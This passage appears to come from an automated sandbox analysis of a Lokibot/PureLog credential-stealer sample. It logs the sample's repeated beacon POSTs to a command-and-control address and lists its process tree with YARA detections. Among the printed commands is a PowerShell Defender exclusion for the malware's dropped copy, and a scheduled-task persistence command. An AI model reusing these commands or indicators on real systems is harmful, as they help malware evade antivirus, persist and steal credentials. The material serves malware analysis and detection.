Nov 28, 2024 13:53:37.671386003 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49923	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:37.929605961 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:38.049670935 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:39.517520905 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49928	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:39.773238897 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:39.893532991 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:41.214277029 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49931	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:41.917542934 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:42.038877010 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:43.432657003 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49936	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:43.694153070 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:43.814507961 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:45.291156054 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49942	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:45.557185888 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:45.677206993 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:47.149077892 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49948	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:47.437643051 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:47.609817028 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:48.834009886 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49951	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:49.103429079 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:49.229391098 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:50.737694979 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49954	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:51.008164883 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:51.134807110 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:52.603863001 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49959	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:52.867790937 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:52.989362955 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:54.504672050 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49965	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:54.772973061 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:54.895597935 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:56.356708050 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49970	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:56.646739006 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:56.768163919 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:58.089629889 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49975	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:53:58.352627993 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:53:58.476191998 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:53:59.992137909 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:53:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49979	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:54:00.416253090 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:54:00.536336899 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:54:01.812099934 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:54:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49984	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:54:02.071367025 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:54:02.191446066 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:54:03.511610985 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:54:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	07:51:56
Start date:	28/11/2024
Path:	C:\Users\user\Desktop\FVR-N2411-07396.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FVR-N2411-07396.exe"
Imagebase:	0x690000
File size:	601'088 bytes
MD5 hash:	2F402635E17B4F0D9C0D6922D384936A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2071531160.0000000005540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2053219827.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:52:00
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
Imagebase:	0x790000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:52:00
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:52:00
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"
Imagebase:	0x670000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:52:00
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:52:00
Start date:	28/11/2024
Path:	C:\Users\user\Desktop\FVR-N2411-07396.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FVR-N2411-07396.exe"
Imagebase:	0x5a0000
File size:	601'088 bytes
MD5 hash:	2F402635E17B4F0D9C0D6922D384936A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000007.00000002.3255881950.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	07:52:02
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
Imagebase:	0x480000
File size:	601'088 bytes
MD5 hash:	2F402635E17B4F0D9C0D6922D384936A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2130538149.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:52:03
Start date:	28/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:52:07
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp"
Imagebase:	0x670000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:52:07
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

